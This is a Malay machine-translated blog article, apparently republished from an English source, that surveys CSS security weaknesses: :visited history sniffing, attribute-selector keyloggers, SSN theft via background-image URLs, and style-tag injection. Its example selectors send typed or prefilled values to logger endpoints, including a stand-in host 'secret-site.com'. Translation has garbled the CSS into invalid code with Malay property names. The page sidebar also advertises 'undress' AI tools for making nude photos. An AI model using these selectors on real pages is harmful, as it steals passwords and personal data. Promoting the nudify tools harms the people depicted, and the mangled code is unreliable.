Jadual Kandungan
Isu pautan yang telah dikunjungi
Keylogger
Kecurian data
Masalah Blok Gaya Baris
Pasti ada lagi
Rumah hujung hadapan web tutorial css Kelemahan keselamatan CSS

Kelemahan keselamatan CSS

Apr 17, 2025 am 10:02 AM

Kelemahan keselamatan CSS

Jangan panik! CSS sendiri bukan risiko keselamatan utama, dan dalam kebanyakan kes tidak perlu terlalu risau.

Walau bagaimanapun, beberapa artikel akan membincangkan ciri -ciri CSS yang berpotensi mengejutkan dan juga membimbangkan. Mari kita meringkaskan:

Isu pautan yang telah dikunjungi

Masalahnya digambarkan seperti berikut:

  1. Terdapat pautan di laman web ke halaman tertentu, seperti Tickle Pigs .
  2. Anda menggunakan :visited untuk menetapkan warna pautan yang dikunjungi, seperti a:visited { color: pink; } , yang bukan gaya ejen pengguna lalai.
  3. Anda menguji gaya pengiraan pautan.
  4. Jika warna berwarna merah jambu, ini bermakna pengguna telah melawat halaman tersebut.
  5. Anda melaporkan maklumat ini kepada pelayan dan melakukan tindakan tertentu dengan sewajarnya (seperti meningkatkan kadar premium insurans).

Anda mungkin melakukan ini dengan CSS sepenuhnya, kerana gaya :visited mungkin mengandungi background-image: url(/data-logger/tickle.php); , yang hanya akan diminta oleh pengguna yang telah melawat halaman tersebut.

Jangan risau! Pelayar telah menyekat serangan ini.

Keylogger

Masalahnya digambarkan seperti berikut:

  1. Terdapat kotak input pada halaman, mungkin kotak input kata laluan.
  2. Anda mengambil skrip rekod sebagai imej latar belakang kotak input dan menambah sebilangan besar pemilih untuk mengumpul maklumat kata laluan.
 input [nilai^= "a"] {latar belakang: url (logger.php? v = a); }
Salin selepas log masuk

Ini tidak mudah dicapai. Atribut value kotak input tidak akan berubah dengan segera kerana input pengguna. Tetapi dalam kerangka seperti React, ini kadang -kadang berlaku. Oleh itu, secara teori, keylogger CSS ini mungkin berfungsi jika anda menambah CSS ini ke halaman log masuk yang dibina dengan React.

Walau bagaimanapun, dalam kes ini, kod JavaScript telah dilaksanakan pada halaman. Untuk serangan sedemikian, JavaScript jauh lebih berbahaya daripada CSS. Keylogger JavaScript memantau peristiwa utama dan melaporkannya melalui Ajax dengan hanya beberapa baris kod.

Dasar Keselamatan Kandungan (CSP) boleh menyekat JavaScript dalam talian yang disuntik oleh pihak ketiga dan XSS ... dan tentu saja, ia juga boleh menyekat CSS.

Kecurian data

Masalahnya digambarkan seperti berikut:

  1. Sekiranya saya dapat menambah CSS yang berniat jahat ke halaman laman web yang anda log masuk ...
  2. Dan laman web memaparkan maklumat sensitif, seperti Nombor Keselamatan Sosial (SSN), pra-penuh dalam bentuk ...
  3. Saya boleh mendapatkannya dengan pemilih harta.
 input#ssn [value = "123-45-6789"] {latar belakang: url (https://secret-site.com/logger.php?ssn=123-45-6789); }
Salin selepas log masuk

Dengan sebilangan besar pemilih, anda boleh menampung semua kemungkinan!

Masalah Blok Gaya Baris

Saya tidak pasti jika ini harus dipersalahkan di CSS, tetapi bayangkan:

 ... masukkan beberapa kandungan yang dihasilkan pengguna ...
Salin selepas log masuk

Mungkin anda membenarkan pengguna menyesuaikan beberapa CSS. Ini adalah vektor serangan kerana mereka boleh menutup tag gaya, tag skrip terbuka, dan menulis kod JavaScript yang berniat jahat.

Pasti ada lagi

Adakah anda memikirkannya? Kongsi.

Saya ragu -ragu mengenai tahap ketakutan terhadap kelemahan keselamatan CSS. Saya tidak mahu mengatasi masalah keselamatan (terutamanya isu pihak ketiga) kerana saya bukan pakar dan keselamatan adalah penting. Tetapi pada masa yang sama, saya tidak pernah mendengar tentang CSS menjadi vektor serangan selain daripada eksperimen pemikiran. Tolong ajar saya!

Atas ialah kandungan terperinci Kelemahan keselamatan CSS. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

Video Face Swap

Video Face Swap

Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!

Alat panas

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1

Hantar Studio 13.0.1

Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6

Dreamweaver CS6

Alat pembangunan web visual

SublimeText3 versi Mac

SublimeText3 versi Mac

Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Vue 3 Vue 3 Apr 02, 2025 pm 06:32 PM

Ia ' s! Tahniah kepada pasukan Vue untuk menyelesaikannya, saya tahu ia adalah usaha besar dan lama datang. Semua dokumen baru juga.

Bolehkah anda mendapatkan nilai harta CSS yang sah dari penyemak imbas? Bolehkah anda mendapatkan nilai harta CSS yang sah dari penyemak imbas? Apr 02, 2025 pm 06:17 PM

Saya mempunyai seseorang yang menulis dengan soalan yang sangat legit ini. Lea hanya blog tentang bagaimana anda boleh mendapatkan sifat CSS yang sah dari penyemak imbas. That ' s seperti ini.

Sedikit di CI/CD Sedikit di CI/CD Apr 02, 2025 pm 06:21 PM

Saya '

Kad yang disusun dengan kedudukan melekit dan sasaran sass Kad yang disusun dengan kedudukan melekit dan sasaran sass Apr 03, 2025 am 10:30 AM

Pada hari yang lain, saya melihat sedikit ini sangat indah dari laman web Corey Ginnivan di mana koleksi kad timbunan di atas satu sama lain semasa anda menatal.

Menggunakan Markdown dan Penyetempatan di Editor Blok WordPress Menggunakan Markdown dan Penyetempatan di Editor Blok WordPress Apr 02, 2025 am 04:27 AM

Jika kita perlu menunjukkan dokumentasi kepada pengguna secara langsung dalam editor WordPress, apakah cara terbaik untuk melakukannya?

Membandingkan penyemak imbas untuk reka bentuk responsif Membandingkan penyemak imbas untuk reka bentuk responsif Apr 02, 2025 pm 06:25 PM

Terdapat beberapa aplikasi desktop ini di mana matlamat menunjukkan laman web anda pada dimensi yang berbeza pada masa yang sama. Oleh itu, anda boleh menulis

Kenapa kawasan -kawasan yang dikurangkan ungu di susun atur flex tersilap dianggap sebagai 'ruang limpahan'? Kenapa kawasan -kawasan yang dikurangkan ungu di susun atur flex tersilap dianggap sebagai 'ruang limpahan'? Apr 05, 2025 pm 05:51 PM

Soalan mengenai kawasan slash ungu dalam susun atur flex Apabila menggunakan susun atur flex, anda mungkin menghadapi beberapa fenomena yang mengelirukan, seperti dalam alat pemaju (D ...

Cara menggunakan grid CSS untuk tajuk dan kaki melekit Cara menggunakan grid CSS untuk tajuk dan kaki melekit Apr 02, 2025 pm 06:29 PM

CSS Grid adalah koleksi sifat yang direka untuk menjadikan susun atur lebih mudah daripada yang pernah berlaku. Seperti apa -apa, ada sedikit keluk pembelajaran, tetapi grid adalah

See all articles